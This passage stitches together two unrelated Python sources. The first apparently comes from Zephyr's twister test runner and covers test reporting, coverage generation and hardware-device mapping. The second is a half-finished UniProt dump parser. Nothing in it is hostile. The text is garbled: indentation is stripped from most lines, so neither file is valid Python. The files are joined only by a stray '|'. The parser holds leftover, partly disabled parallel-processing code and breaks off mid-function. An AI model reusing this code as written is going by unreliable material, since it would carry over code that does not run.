device_testing=self.device_testing,
cmake_only=self.cmake_only,
cleanup=self.cleanup,
valgrind=self.enable_valgrind,
inline_logs=self.inline_logs,
generator=self.generator,
generator_cmd=self.generator_cmd,
verbose=self.verbose,
warnings_as_errors=self.warnings_as_errors,
overflow_as_errors=self.overflow_as_errors
)
pb.process(pipeline, done_queue, task, lock, results)
return True
def execute(self, pipeline, done, results):
lock = Lock()
logger.info("Adding tasks to the queue...")
self.add_tasks_to_queue(pipeline, self.build_only, self.test_only)
logger.info("Added initial list of jobs to queue")
processes = []
for job in range(self.jobs):
logger.debug(f"Launch process {job}")
p = Process(target=self.pipeline_mgr, args=(pipeline, done, lock, results, ))
processes.append(p)
p.start()
try:
for p in processes:
p.join()
except KeyboardInterrupt:
logger.info("Execution interrupted")
for p in processes:
p.terminate()
# FIXME: This needs to move out.
if self.enable_size_report and not self.cmake_only:
# Parallelize size calculation
executor = concurrent.futures.ThreadPoolExecutor(self.jobs)
futures = [executor.submit(self.calc_one_elf_size, instance)
for instance in self.instances.values()]
concurrent.futures.wait(futures)
else:
for instance in self.instances.values():
instance.metrics["ram_size"] = 0
instance.metrics["rom_size"] = 0
instance.metrics["handler_time"] = instance.handler.duration if instance.handler else 0
instance.metrics["unrecognized"] = []
return results
def discard_report(self, filename):
try:
if not self.discards:
raise TwisterRuntimeError("apply_filters() hasn't been run!")
except Exception as e:
logger.error(str(e))
sys.exit(2)
with open(filename, "wt") as csvfile:
fieldnames = ["test", "arch", "platform", "reason"]
cw = csv.DictWriter(csvfile, fieldnames, lineterminator=os.linesep)
cw.writeheader()
for instance, reason in sorted(self.discards.items()):
rowdict = {"test": instance.testcase.name,
"arch": instance.platform.arch,
"platform": instance.platform.name,
"reason": reason}
cw.writerow(rowdict)
def target_report(self, outdir, suffix, append=False):
platforms = {inst.platform.name for _, inst in self.instances.items()}
for platform in platforms:
if suffix:
filename = os.path.join(outdir,"{}_{}.xml".format(platform, suffix))
else:
filename = os.path.join(outdir,"{}.xml".format(platform))
self.xunit_report(filename, platform, full_report=True,
append=append, version=self.version)
@staticmethod
def process_log(log_file):
filtered_string = ""
if os.path.exists(log_file):
with open(log_file, "rb") as f:
log = f.read().decode("utf-8")
filtered_string = ''.join(filter(lambda x: x in string.printable, log))
return filtered_string
def xunit_report(self, filename, platform=None, full_report=False, append=False, version="NA"):
total = 0
fails = passes = errors = skips = 0
if platform:
selected = [platform]
logger.info(f"Writing target report for {platform}...")
else:
logger.info(f"Writing xunit report {filename}...")
selected = self.selected_platforms
if os.path.exists(filename) and append:
tree = ET.parse(filename)
eleTestsuites = tree.getroot()
else:
eleTestsuites = ET.Element('testsuites')
for p in selected:
inst = self.get_platform_instances(p)
fails = 0
passes = 0
errors = 0
skips = 0
duration = 0
for _, instance in inst.items():
handler_time = instance.metrics.get('handler_time', 0)
duration += handler_time
if full_report and instance.run:
for k in instance.results.keys():
if instance.results[k] == 'PASS':
passes += 1
elif instance.results[k] == 'BLOCK':
errors += 1
elif instance.results[k] == 'SKIP' or instance.status in ['skipped']:
skips += 1
else:
fails += 1
else:
if instance.status in ["error", "failed", "timeout", "flash_error"]:
if instance.reason in ['build_error', 'handler_crash']:
errors += 1
else:
fails += 1
elif instance.status == 'skipped':
skips += 1
elif instance.status == 'passed':
passes += 1
else:
if instance.status:
logger.error(f"{instance.name}: Unknown status {instance.status}")
else:
logger.error(f"{instance.name}: No status")
total = (errors + passes + fails + skips)
# do not produce a report if no tests were actually run (only built)
if total == 0:
continue
run = p
eleTestsuite = None
# When we re-run the tests, we re-use the results and update only with
# the newly run tests.
if os.path.exists(filename) and append:
ts = eleTestsuites.findall(f'testsuite/[@name="{p}"]')
if ts:
eleTestsuite = ts[0]
eleTestsuite.attrib['failures'] = "%d" % fails
eleTestsuite.attrib['errors'] = "%d" % errors
eleTestsuite.attrib['skipped'] = "%d" % skips
else:
logger.info(f"Did not find any existing results for {p}")
eleTestsuite = ET.SubElement(eleTestsuites, 'testsuite',
name=run, time="%f" % duration,
tests="%d" % (total),
failures="%d" % fails,
errors="%d" % (errors), skipped="%s" % (skips))
eleTSPropetries = ET.SubElement(eleTestsuite, 'properties')
# Multiple 'property' can be added to 'properties'
# differing by name and value
ET.SubElement(eleTSPropetries, 'property', name="version", value=version)
else:
eleTestsuite = ET.SubElement(eleTestsuites, 'testsuite',
name=run, time="%f" % duration,
tests="%d" % (total),
failures="%d" % fails,
errors="%d" % (errors), skipped="%s" % (skips))
eleTSPropetries = ET.SubElement(eleTestsuite, 'properties')
# Multiple 'property' can be added to 'properties'
# differing by name and value
ET.SubElement(eleTSPropetries, 'property', name="version", value=version)
for _, instance in inst.items():
if full_report:
tname = os.path.basename(instance.testcase.name)
else:
tname = instance.testcase.id
handler_time = instance.metrics.get('handler_time', 0)
if full_report:
for k in instance.results.keys():
                        # remove testcases that are being re-run from existing reports
for tc in eleTestsuite.findall(f'testcase/[@name="{k}"]'):
eleTestsuite.remove(tc)
classname = ".".join(tname.split(".")[:2])
eleTestcase = ET.SubElement(
eleTestsuite, 'testcase',
classname=classname,
name="%s" % (k), time="%f" % handler_time)
if instance.results[k] in ['FAIL', 'BLOCK'] or \
(not instance.run and instance.status in ["error", "failed", "timeout"]):
if instance.results[k] == 'FAIL':
el = ET.SubElement(
eleTestcase,
'failure',
type="failure",
message="failed")
else:
el = ET.SubElement(
eleTestcase,
'error',
type="failure",
message=instance.reason)
log_root = os.path.join(self.outdir, instance.platform.name, instance.testcase.name)
log_file = os.path.join(log_root, "handler.log")
el.text = self.process_log(log_file)
elif instance.results[k] == 'PASS' \
or (not instance.run and instance.status in ["passed"]):
pass
elif instance.results[k] == 'SKIP' or (instance.status in ["skipped"]):
el = ET.SubElement(eleTestcase, 'skipped', type="skipped", message=instance.reason)
else:
el = ET.SubElement(
eleTestcase,
'error',
type="error",
message=f"{instance.reason}")
else:
if platform:
classname = ".".join(instance.testcase.name.split(".")[:2])
else:
classname = p + ":" + ".".join(instance.testcase.name.split(".")[:2])
                    # remove testcases that are being re-run from existing reports
for tc in eleTestsuite.findall(f'testcase/[@classname="{classname}"][@name="{instance.testcase.name}"]'):
eleTestsuite.remove(tc)
eleTestcase = ET.SubElement(eleTestsuite, 'testcase',
classname=classname,
name="%s" % (instance.testcase.name),
time="%f" % handler_time)
if instance.status in ["error", "failed", "timeout", "flash_error"]:
failure = ET.SubElement(
eleTestcase,
'failure',
type="failure",
message=instance.reason)
log_root = ("%s/%s/%s" % (self.outdir, instance.platform.name, instance.testcase.name))
bl = os.path.join(log_root, "build.log")
hl = os.path.join(log_root, "handler.log")
log_file = bl
if instance.reason != 'Build error':
if os.path.exists(hl):
log_file = hl
else:
log_file = bl
failure.text = self.process_log(log_file)
elif instance.status == "skipped":
ET.SubElement(eleTestcase, 'skipped', type="skipped", message="Skipped")
result = ET.tostring(eleTestsuites)
with open(filename, 'wb') as report:
report.write(result)
return fails, passes, errors, skips
def csv_report(self, filename):
with open(filename, "wt") as csvfile:
fieldnames = ["test", "arch", "platform", "status",
"extra_args", "handler", "handler_time", "ram_size",
"rom_size"]
cw = csv.DictWriter(csvfile, fieldnames, lineterminator=os.linesep)
cw.writeheader()
for instance in self.instances.values():
rowdict = {"test": instance.testcase.name,
"arch": instance.platform.arch,
"platform": instance.platform.name,
"extra_args": " ".join(instance.testcase.extra_args),
"handler": instance.platform.simulation}
rowdict["status"] = instance.status
if instance.status not in ["error", "failed", "timeout"]:
if instance.handler:
rowdict["handler_time"] = instance.metrics.get("handler_time", 0)
ram_size = instance.metrics.get("ram_size", 0)
rom_size = instance.metrics.get("rom_size", 0)
rowdict["ram_size"] = ram_size
rowdict["rom_size"] = rom_size
cw.writerow(rowdict)
def json_report(self, filename, append=False, version="NA"):
logger.info(f"Writing JSON report {filename}")
report = {}
selected = self.selected_platforms
report["environment"] = {"os": os.name,
"zephyr_version": version,
"toolchain": self.get_toolchain()
}
json_data = {}
if os.path.exists(filename) and append:
with open(filename, 'r') as json_file:
json_data = json.load(json_file)
suites = json_data.get("testsuites", [])
if suites:
suite = suites[0]
testcases = suite.get("testcases", [])
else:
suite = {}
testcases = []
for p in selected:
inst = self.get_platform_instances(p)
for _, instance in inst.items():
testcase = {}
handler_log = os.path.join(instance.build_dir, "handler.log")
build_log = os.path.join(instance.build_dir, "build.log")
device_log = os.path.join(instance.build_dir, "device.log")
handler_time = instance.metrics.get('handler_time', 0)
                ram_size = instance.metrics.get("ram_size", 0)
                rom_size = instance.metrics.get("rom_size", 0)
for k in instance.results.keys():
testcases = list(filter(lambda d: not (d.get('testcase') == k and d.get('platform') == p), testcases ))
testcase = {"testcase": k,
"arch": instance.platform.arch,
"platform": p,
}
if ram_size:
testcase["ram_size"] = ram_size
if rom_size:
testcase["rom_size"] = rom_size
if instance.results[k] in ["SKIP"] or instance.status == 'skipped':
testcase["status"] = "skipped"
testcase["reason"] = instance.reason
elif instance.results[k] in ["PASS"] or instance.status == 'passed':
testcase["status"] = "passed"
if instance.handler:
testcase["execution_time"] = handler_time
elif instance.results[k] in ['FAIL', 'BLOCK'] or instance.status in ["error", "failed", "timeout", "flash_error"]:
testcase["status"] = "failed"
testcase["reason"] = instance.reason
testcase["execution_time"] = handler_time
if os.path.exists(handler_log):
testcase["test_output"] = self.process_log(handler_log)
elif os.path.exists(device_log):
testcase["device_log"] = self.process_log(device_log)
else:
testcase["build_log"] = self.process_log(build_log)
testcases.append(testcase)
suites = [ {"testcases": testcases} ]
report["testsuites"] = suites
with open(filename, "wt") as json_file:
json.dump(report, json_file, indent=4, separators=(',',':'))
def get_testcase(self, identifier):
results = []
for _, tc in self.testcases.items():
for case in tc.cases:
if case == identifier:
results.append(tc)
return results
def verify_platforms_existence(self, platform_names_to_verify, log_info=""):
"""
        Verify that each platform name (passed by the --platform option, or in
        a yaml file as platform_allow or integration_platforms) is a known
        platform. If it is not, log an error and exit.
        """
        for platform in platform_names_to_verify:
            if platform not in self.platform_names:
                logger.error(f"{log_info} - unrecognized platform - {platform}")
                sys.exit(2)
def create_build_dir_links(self):
"""
        Iterate through all non-skipped instances in the suite and create a
        link for each instance's build directory. Those links will be passed
        in the next steps to the CMake command.
"""
links_dir_name = "twister_links" # folder for all links
links_dir_path = os.path.join(self.outdir, links_dir_name)
if not os.path.exists(links_dir_path):
os.mkdir(links_dir_path)
for instance in self.instances.values():
if instance.status != "skipped":
self._create_build_dir_link(links_dir_path, instance)
def _create_build_dir_link(self, links_dir_path, instance):
"""
        Create the build directory under its original "long" path, then create
        a link with a shorter path and replace build_dir with that link. The
        link is what gets passed to the CMake command; this helps to limit the
        path length, which can be significant when building with CMake on
        Windows.
"""
os.makedirs(instance.build_dir, exist_ok=True)
link_name = f"test_{self.link_dir_counter}"
link_path = os.path.join(links_dir_path, link_name)
if os.name == "nt": # if OS is Windows
command = ["mklink", "/J", f"{link_path}", f"{instance.build_dir}"]
subprocess.call(command, shell=True)
else: # for Linux and MAC OS
os.symlink(instance.build_dir, link_path)
# Here original build directory is replaced with symbolic link. It will
# be passed to CMake command
instance.build_dir = link_path
self.link_dir_counter += 1
class CoverageTool:
""" Base class for every supported coverage tool
"""
def __init__(self):
self.gcov_tool = None
self.base_dir = None
@staticmethod
def factory(tool):
if tool == 'lcov':
t = Lcov()
elif tool == 'gcovr':
t = Gcovr()
else:
logger.error("Unsupported coverage tool specified: {}".format(tool))
return None
logger.debug(f"Select {tool} as the coverage tool...")
return t
@staticmethod
def retrieve_gcov_data(input_file):
logger.debug("Working on %s" % input_file)
extracted_coverage_info = {}
capture_data = False
capture_complete = False
with open(input_file, 'r') as fp:
for line in fp.readlines():
if re.search("GCOV_COVERAGE_DUMP_START", line):
capture_data = True
continue
if re.search("GCOV_COVERAGE_DUMP_END", line):
capture_complete = True
break
# Loop until the coverage data is found.
if not capture_data:
continue
if line.startswith("*"):
sp = line.split("<")
if len(sp) > 1:
# Remove the leading delimiter "*"
file_name = sp[0][1:]
# Remove the trailing new line char
hex_dump = sp[1][:-1]
else:
continue
else:
continue
extracted_coverage_info.update({file_name: hex_dump})
if not capture_data:
capture_complete = True
return {'complete': capture_complete, 'data': extracted_coverage_info}
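    # Illustrative sketch, assuming a made-up file name and hex payload, of the
    # handler.log section retrieve_gcov_data() parses:
    #
    #   GCOV_COVERAGE_DUMP_START
    #   *src/main.gcda<0a0b0c
    #   GCOV_COVERAGE_DUMP_END
    #
    # which would be returned as
    #   {'complete': True, 'data': {'src/main.gcda': '0a0b0c'}}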
@staticmethod
def create_gcda_files(extracted_coverage_info):
logger.debug("Generating gcda files")
for filename, hexdump_val in extracted_coverage_info.items():
            # if kobject_hash is given for coverage, gcovr fails,
            # hence skip it; the problem exists only in gcovr v4.1
if "kobject_hash" in filename:
filename = (filename[:-4]) + "gcno"
try:
os.remove(filename)
except Exception:
pass
continue
with open(filename, 'wb') as fp:
fp.write(bytes.fromhex(hexdump_val))
def generate(self, outdir):
for filename in glob.glob("%s/**/handler.log" % outdir, recursive=True):
gcov_data = self.__class__.retrieve_gcov_data(filename)
capture_complete = gcov_data['complete']
extracted_coverage_info = gcov_data['data']
if capture_complete:
self.__class__.create_gcda_files(extracted_coverage_info)
logger.debug("Gcov data captured: {}".format(filename))
else:
logger.error("Gcov data capture incomplete: {}".format(filename))
with open(os.path.join(outdir, "coverage.log"), "a") as coveragelog:
ret = self._generate(outdir, coveragelog)
if ret == 0:
logger.info("HTML report generated: {}".format(
os.path.join(outdir, "coverage", "index.html")))
class Lcov(CoverageTool):
def __init__(self):
super().__init__()
self.ignores = []
def add_ignore_file(self, pattern):
self.ignores.append('*' + pattern + '*')
def add_ignore_directory(self, pattern):
self.ignores.append('*/' + pattern + '/*')
def _generate(self, outdir, coveragelog):
coveragefile = os.path.join(outdir, "coverage.info")
ztestfile = os.path.join(outdir, "ztest.info")
cmd = ["lcov", "--gcov-tool", self.gcov_tool,
"--capture", "--directory", outdir,
"--rc", "lcov_branch_coverage=1",
"--output-file", coveragefile]
cmd_str = " ".join(cmd)
logger.debug(f"Running {cmd_str}...")
subprocess.call(cmd, stdout=coveragelog)
# We want to remove tests/* and tests/ztest/test/* but save tests/ztest
subprocess.call(["lcov", "--gcov-tool", self.gcov_tool, "--extract",
coveragefile,
os.path.join(self.base_dir, "tests", "ztest", "*"),
"--output-file", ztestfile,
"--rc", "lcov_branch_coverage=1"], stdout=coveragelog)
if os.path.exists(ztestfile) and os.path.getsize(ztestfile) > 0:
subprocess.call(["lcov", "--gcov-tool", self.gcov_tool, "--remove",
ztestfile,
os.path.join(self.base_dir, "tests/ztest/test/*"),
"--output-file", ztestfile,
"--rc", "lcov_branch_coverage=1"],
stdout=coveragelog)
files = [coveragefile, ztestfile]
else:
files = [coveragefile]
for i in self.ignores:
subprocess.call(
["lcov", "--gcov-tool", self.gcov_tool, "--remove",
coveragefile, i, "--output-file",
coveragefile, "--rc", "lcov_branch_coverage=1"],
stdout=coveragelog)
# The --ignore-errors source option is added to avoid it exiting due to
# samples/application_development/external_lib/
return subprocess.call(["genhtml", "--legend", "--branch-coverage",
"--ignore-errors", "source",
"-output-directory",
os.path.join(outdir, "coverage")] + files,
stdout=coveragelog)
class Gcovr(CoverageTool):
def __init__(self):
super().__init__()
self.ignores = []
def add_ignore_file(self, pattern):
self.ignores.append('.*' + pattern + '.*')
def add_ignore_directory(self, pattern):
self.ignores.append(".*/" + pattern + '/.*')
@staticmethod
def _interleave_list(prefix, list):
tuple_list = [(prefix, item) for item in list]
return [item for sublist in tuple_list for item in sublist]
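    # For example (illustrative): _interleave_list("-e", ["foo", "bar"]) returns
    # ["-e", "foo", "-e", "bar"], i.e. the prefix is repeated before every item.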
def _generate(self, outdir, coveragelog):
coveragefile = os.path.join(outdir, "coverage.json")
ztestfile = os.path.join(outdir, "ztest.json")
excludes = Gcovr._interleave_list("-e", self.ignores)
# We want to remove tests/* and tests/ztest/test/* but save tests/ztest
cmd = ["gcovr", "-r", self.base_dir, "--gcov-executable",
self.gcov_tool, "-e", "tests/*"] + excludes + ["--json", "-o",
coveragefile, outdir]
cmd_str = " ".join(cmd)
logger.debug(f"Running {cmd_str}...")
subprocess.call(cmd, stdout=coveragelog)
subprocess.call(["gcovr", "-r", self.base_dir, "--gcov-executable",
self.gcov_tool, "-f", "tests/ztest", "-e",
"tests/ztest/test/*", "--json", "-o", ztestfile,
outdir], stdout=coveragelog)
if os.path.exists(ztestfile) and os.path.getsize(ztestfile) > 0:
files = [coveragefile, ztestfile]
else:
files = [coveragefile]
subdir = os.path.join(outdir, "coverage")
os.makedirs(subdir, exist_ok=True)
tracefiles = self._interleave_list("--add-tracefile", files)
return subprocess.call(["gcovr", "-r", self.base_dir, "--html",
"--html-details"] + tracefiles +
["-o", os.path.join(subdir, "index.html")],
stdout=coveragelog)
class DUT(object):
def __init__(self,
id=None,
serial=None,
serial_baud=None,
platform=None,
product=None,
serial_pty=None,
connected=False,
pre_script=None,
post_script=None,
post_flash_script=None,
runner=None):
self.serial = serial
self.baud = serial_baud or 115200
self.platform = platform
self.serial_pty = serial_pty
self._counter = Value("i", 0)
self._available = Value("i", 1)
self.connected = connected
self.pre_script = pre_script
self.id = id
self.product = product
self.runner = runner
self.fixtures = []
self.post_flash_script = post_flash_script
self.post_script = post_script
self.pre_script = pre_script
self.probe_id = None
self.notes = None
self.lock = Lock()
self.match = False
@property
def available(self):
with self._available.get_lock():
return self._available.value
@available.setter
def available(self, value):
with self._available.get_lock():
self._available.value = value
@property
def counter(self):
with self._counter.get_lock():
return self._counter.value
@counter.setter
def counter(self, value):
with self._counter.get_lock():
self._counter.value = value
def to_dict(self):
d = {}
exclude = ['_available', '_counter', 'match']
v = vars(self)
for k in v.keys():
if k not in exclude and v[k]:
d[k] = v[k]
return d
def __repr__(self):
return f"<{self.platform} ({self.product}) on {self.serial}>"
class HardwareMap:
schema_path = os.path.join(ZEPHYR_BASE, "scripts", "schemas", "twister", "hwmap-schema.yaml")
manufacturer = [
'ARM',
'SEGGER',
'MBED',
'STMicroelectronics',
'Atmel Corp.',
'Texas Instruments',
'Silicon Labs',
'NXP Semiconductors',
'Microchip Technology Inc.',
'FTDI',
'Digilent'
]
runner_mapping = {
'pyocd': [
'DAPLink CMSIS-DAP',
'MBED CMSIS-DAP'
],
'jlink': [
'J-Link',
'J-Link OB'
],
'openocd': [
'STM32 STLink', '^XDS110.*', 'STLINK-V3'
],
'dediprog': [
'TTL232R-3V3',
'MCP2200 USB Serial Port Emulator'
]
}
def __init__(self):
self.detected = []
self.duts = []
def add_device(self, serial, platform, pre_script, is_pty, baud=None):
device = DUT(platform=platform, connected=True, pre_script=pre_script, serial_baud=baud)
if is_pty:
device.serial_pty = serial
else:
device.serial = serial
self.duts.append(device)
def load(self, map_file):
hwm_schema = scl.yaml_load(self.schema_path)
duts = scl.yaml_load_verify(map_file, hwm_schema)
for dut in duts:
pre_script = dut.get('pre_script')
post_script = dut.get('post_script')
post_flash_script = dut.get('post_flash_script')
platform = dut.get('platform')
id = dut.get('id')
runner = dut.get('runner')
serial = dut.get('serial')
baud = dut.get('baud', None)
product = dut.get('product')
fixtures = dut.get('fixtures', [])
new_dut = DUT(platform=platform,
product=product,
runner=runner,
id=id,
serial=serial,
serial_baud=baud,
connected=serial is not None,
pre_script=pre_script,
post_script=post_script,
post_flash_script=post_flash_script)
new_dut.fixtures = fixtures
new_dut.counter = 0
self.duts.append(new_dut)
def scan(self, persistent=False):
from serial.tools import list_ports
if persistent and platform.system() == 'Linux':
# On Linux, /dev/serial/by-id provides symlinks to
# '/dev/ttyACMx' nodes using names which are unique as
# long as manufacturers fill out USB metadata nicely.
#
# This creates a map from '/dev/ttyACMx' device nodes
# to '/dev/serial/by-id/usb-...' symlinks. The symlinks
# go into the hardware map because they stay the same
# even when the user unplugs / replugs the device.
#
# Some inexpensive USB/serial adapters don't result
# in unique names here, though, so use of this feature
# requires explicitly setting persistent=True.
by_id = Path('/dev/serial/by-id')
def readlink(link):
return str((by_id / link).resolve())
persistent_map = {readlink(link): str(link)
for link in by_id.iterdir()}
else:
persistent_map = {}
serial_devices = list_ports.comports()
logger.info("Scanning connected hardware...")
for d in serial_devices:
if d.manufacturer in self.manufacturer:
# TI XDS110 can have multiple serial devices for a single board
# assume endpoint 0 is the serial, skip all others
if d.manufacturer == 'Texas Instruments' and not d.location.endswith('0'):
continue
s_dev = DUT(platform="unknown",
id=d.serial_number,
serial=persistent_map.get(d.device, d.device),
product=d.product,
runner='unknown',
connected=True)
for runner, _ in self.runner_mapping.items():
products = self.runner_mapping.get(runner)
if d.product in products:
s_dev.runner = runner
continue
# Try regex matching
for p in products:
if re.match(p, d.product):
s_dev.runner = runner
s_dev.connected = True
s_dev.lock = None
self.detected.append(s_dev)
else:
logger.warning("Unsupported device (%s): %s" % (d.manufacturer, d))
def save(self, hwm_file):
# use existing map
self.detected.sort(key=lambda x: x.serial or '')
if os.path.exists(hwm_file):
with open(hwm_file, 'r') as yaml_file:
hwm = yaml.load(yaml_file, Loader=SafeLoader)
if hwm:
hwm.sort(key=lambda x: x['serial'] or '')
# disconnect everything
for h in hwm:
h['connected'] = False
h['serial'] = None
for _detected in self.detected:
for h in hwm:
if _detected.id == h['id'] and _detected.product == h['product'] and not _detected.match:
h['connected'] = True
h['serial'] = _detected.serial
_detected.match = True
new_duts = list(filter(lambda d: not d.match, self.detected))
new = []
for d in new_duts:
new.append(d.to_dict())
if hwm:
hwm = hwm + new
else:
hwm = new
with open(hwm_file, 'w') as yaml_file:
yaml.dump(hwm, yaml_file, Dumper=Dumper, default_flow_style=False)
self.load(hwm_file)
logger.info("Registered devices:")
self.dump()
else:
# create new file
dl = []
for _connected in self.detected:
platform = _connected.platform
id = _connected.id
runner = _connected.runner
serial = _connected.serial
product = _connected.product
d = {
'platform': platform,
'id': id,
'runner': runner,
'serial': serial,
'product': product,
'connected': _connected.connected
}
dl.append(d)
with open(hwm_file, 'w') as yaml_file:
yaml.dump(dl, yaml_file, Dumper=Dumper, default_flow_style=False)
logger.info("Detected devices:")
self.dump(detected=True)
def dump(self, filtered=[], header=[], connected_only=False, detected=False):
print("")
table = []
if detected:
to_show = self.detected
else:
to_show = self.duts
if not header:
header = ["Platform", "ID", "Serial device"]
for p in to_show:
platform = p.platform
connected = p.connected
if filtered and platform not in filtered:
continue
if not connected_only or connected:
table.append([platform, p.id, p.serial])
print(tabulate(table, headers=header, tablefmt="github"))
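# Minimal usage sketch of HardwareMap; the map file name is an assumption:
#
#   hwm = HardwareMap()
#   hwm.scan(persistent=False)
#   hwm.save("map.yaml")             # merges into an existing map or creates one
#   hwm.dump(connected_only=True)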
|
parallel_parse_UniProt_dump_v2.py
|
# from collections import defaultdict
import os, fileinput, subprocess, sys
import zlib, gzip
import tools, variables
import create_SQL_tables_snakemake as cst
import obo_parser
import random, multiprocessing
from collections import deque
PLATFORM = sys.platform
# def unzip_file(fn_in, fn_out, number_of_processes=4):
# if PLATFORM == "linux": # Debian: "Linux"
# fn_bash_script = "bash_script_pigz.sh"
# with open(fn_bash_script, "w") as fh:
# fh.write("#!/usr/bin/env bash\n")
# shellcmd_1 = "pigz -c -d -p {} {} > {}".format(number_of_processes, fn_in, fn_out)
# fh.write(shellcmd_1 + "\n")
# subprocess.call("chmod 744 ./{}".format(fn_bash_script), shell=True)
# subprocess.call("./{}".format(fn_bash_script), shell=True)
# os.remove(fn_bash_script)
# else:
# tools.gunzip_file(fn_in, fn_out=fn_out)
#
# def split_file_into_chunks_using_delimiter(fn_in, dir_out, num_chunks, recstart, recend):
# if not os.path.exists(dir_out):
# os.makedirs(dir_out)
# size = os.path.getsize(fn_in)
# positions = sorted([random.randint(0, size) for _ in range(num_chunks)])
# # for
from multiprocessing import JoinableQueue
from multiprocessing.context import Process
class Renderer:
queue = None
def __init__(self, nb_workers=2):
self.queue = JoinableQueue()
self.processes = [Process(target=self.upload) for i in range(nb_workers)]
for p in self.processes:
p.start()
def render(self, item):
self.queue.put(item)
def upload(self):
while True:
item = self.queue.get()
if item is None:
break
# process your item here
self.queue.task_done()
def terminate(self):
""" wait until queue is empty and terminate processes """
self.queue.join()
for p in self.processes:
p.terminate()
# r = Renderer()
# r.render(item1)
# r.render(item2)
# r.terminate()
def Protein_2_Function_table_UniProtDump_UPS(fn_in_Functions_table_UPK, fn_in_obo_GO, fn_in_obo_UPK, fn_in_list_uniprot_dumps, fn_in_interpro_parent_2_child_tree, fn_in_hierarchy_reactome, fn_out_Protein_2_Function_table_UniProt_dump, fn_out_UniProtID_2_ENSPs_2_KEGGs_mapping, fn_out_UniProt_AC_2_ID_2_Taxid, verbose=True):
# fn_in_list_uniprot_dumps_temp = []
# for fn_in in fn_in_list_uniprot_dumps:
# fn_out = fn_in.replace("gz", "") + ".temp"
# fn_in_list_uniprot_dumps_temp.append(fn_out)
# unzip_file(fn_in, fn_out, number_of_processes=4)
fn_in_Functions_table_UPK = os.path.join(variables.TABLES_DIR, "Functions_table_UPK.txt")
fn_in_obo_GO = os.path.join(variables.DOWNLOADS_DIR, "go-basic.obo")
fn_in_obo_UPK = os.path.join(variables.DOWNLOADS_DIR, "keywords-all.obo")
fn_in_interpro_parent_2_child_tree = os.path.join(variables.DOWNLOADS_DIR, "interpro_parent_2_child_tree.txt")
fn_in_hierarchy_reactome = os.path.join(variables.DOWNLOADS_DIR, "RCTM_hierarchy.tsv")
etype_UniProtKeywords = variables.id_2_entityTypeNumber_dict["UniProtKeywords"]
etype_GOMF = variables.id_2_entityTypeNumber_dict['GO:0003674']
etype_GOCC = variables.id_2_entityTypeNumber_dict['GO:0005575']
etype_GOBP = variables.id_2_entityTypeNumber_dict['GO:0008150']
etype_interpro = variables.id_2_entityTypeNumber_dict['INTERPRO']
etype_pfam = variables.id_2_entityTypeNumber_dict['PFAM']
etype_reactome = variables.id_2_entityTypeNumber_dict['Reactome']
GO_dag = obo_parser.GODag(obo_file=fn_in_obo_GO, upk=False)
UPK_dag = obo_parser.GODag(obo_file=fn_in_obo_UPK, upk=True)
UPK_Name_2_AN_dict = cst.get_keyword_2_upkan_dict(fn_in_Functions_table_UPK)
# UPKs_not_in_obo_list, GOterms_not_in_obo_temp = [], []
child_2_parent_dict_interpro, _ = cst.get_child_2_direct_parents_and_term_2_level_dict_interpro(fn_in_interpro_parent_2_child_tree)
lineage_dict_interpro = cst.get_lineage_from_child_2_direct_parent_dict(child_2_parent_dict_interpro)
child_2_parent_dict_reactome = cst.get_child_2_direct_parent_dict_RCTM(fn_in_hierarchy_reactome)
counter = 0
num_entries = 1000
num_workers = 10
# pool = multiprocessing.Pool(num_workers)
queue = JoinableQueue()
entries_2_work = deque()
# entries_2_work.append()
for uniprot_dump in fn_in_list_uniprot_dumps:
for entries in yield_entry_UniProt_dat_dump_parallel(uniprot_dump, num_entries):
entries_2_work.append(entries)
stuff = entries, UPK_Name_2_AN_dict, UPK_dag, lineage_dict_interpro, child_2_parent_dict_reactome, GO_dag, etype_UniProtKeywords, etype_GOMF, etype_GOCC, etype_GOBP, etype_interpro, etype_pfam, etype_reactome
# pool.map(bubu, stuff)
            bubu(*stuff)  # JoinableQueue.join() takes no arguments; process this chunk directly for now
def yield_entry_UniProt_dat_dump_parallel(fn_in, num_entries=100):
entries = []
counter = 0
for entry in cst.yield_entry_UniProt_dat_dump(fn_in):
entries.append(entry)
counter += 1
if counter % num_entries == 0:
yield entries
entries = []
yield entries
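# Illustrative note: this wrapper batches the per-entry generator from
# create_SQL_tables_snakemake into chunks of num_entries; the final chunk may be
# shorter, or empty when the total is an exact multiple. Assumed usage (the dump
# file name is hypothetical):
#
#   for chunk in yield_entry_UniProt_dat_dump_parallel("uniprot_sprot.dat.gz", num_entries=1000):
#       bubu(chunk, ...)  # see bubu() below for the full argument list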
def bubu(entries, UPK_Name_2_AN_dict, UPK_dag, lineage_dict_interpro, child_2_parent_dict_reactome, GO_dag, etype_UniProtKeywords, etype_GOMF, etype_GOCC, etype_GOBP, etype_interpro, etype_pfam, etype_reactome):
for UniProtID, UniProtAC_list, NCBI_Taxid, functions_2_return in parse_uniprot_dat_dump_yield_entry_v2_parallel(entries):
Keywords_list, GOterm_list, InterPro, Pfam, KEGG, Reactome, STRING, *Proteomes = functions_2_return
# ['Complete proteome', 'Reference proteome', 'Transcription', 'Activator', 'Transcription regulation', ['GO:0046782'], ['IPR007031'], ['PF04947'], ['vg:2947773'], [], [], ['UP000008770']]
# for UniProtAN in UniProtAC_and_ID_list:
if len(Keywords_list) > 0:
UPK_ANs, UPKs_not_in_obo_temp = cst.map_keyword_name_2_AN(UPK_Name_2_AN_dict, Keywords_list)
# UPKs_not_in_obo_list += UPKs_not_in_obo_temp
UPK_ANs, UPKs_not_in_obo_temp = cst.get_all_parent_terms(UPK_ANs, UPK_dag)
# UPKs_not_in_obo_list += UPKs_not_in_obo_temp
if len(UPK_ANs) > 0:
# fh_out.write(UniProtID + "\t" + cst.format_list_of_string_2_postgres_array(sorted(UPK_ANs)) + "\t" + etype_UniProtKeywords + "\t" + NCBI_Taxid + "\n")
print(UniProtID + "\t" + cst.format_list_of_string_2_postgres_array(sorted(UPK_ANs)) + "\t" + etype_UniProtKeywords + "\t" + NCBI_Taxid + "\n")
if len(GOterm_list) > 0: # do backtracking, split GO into 3 categories and add etype
GOterm_list, not_in_obo_GO = cst.get_all_parent_terms(GOterm_list, GO_dag)
# GOterms_not_in_obo_temp += not_in_obo_GO
MFs, CPs, BPs, not_in_obo_GO = cst.divide_into_categories(GOterm_list, GO_dag, [], [], [], [])
# GOterms_not_in_obo_temp += not_in_obo_GO
if MFs:
# fh_out.write(UniProtID + "\t" + cst.format_list_of_string_2_postgres_array(sorted(MFs)) + "\t" + etype_GOMF + "\t" + NCBI_Taxid + "\n") # 'Molecular Function', -23
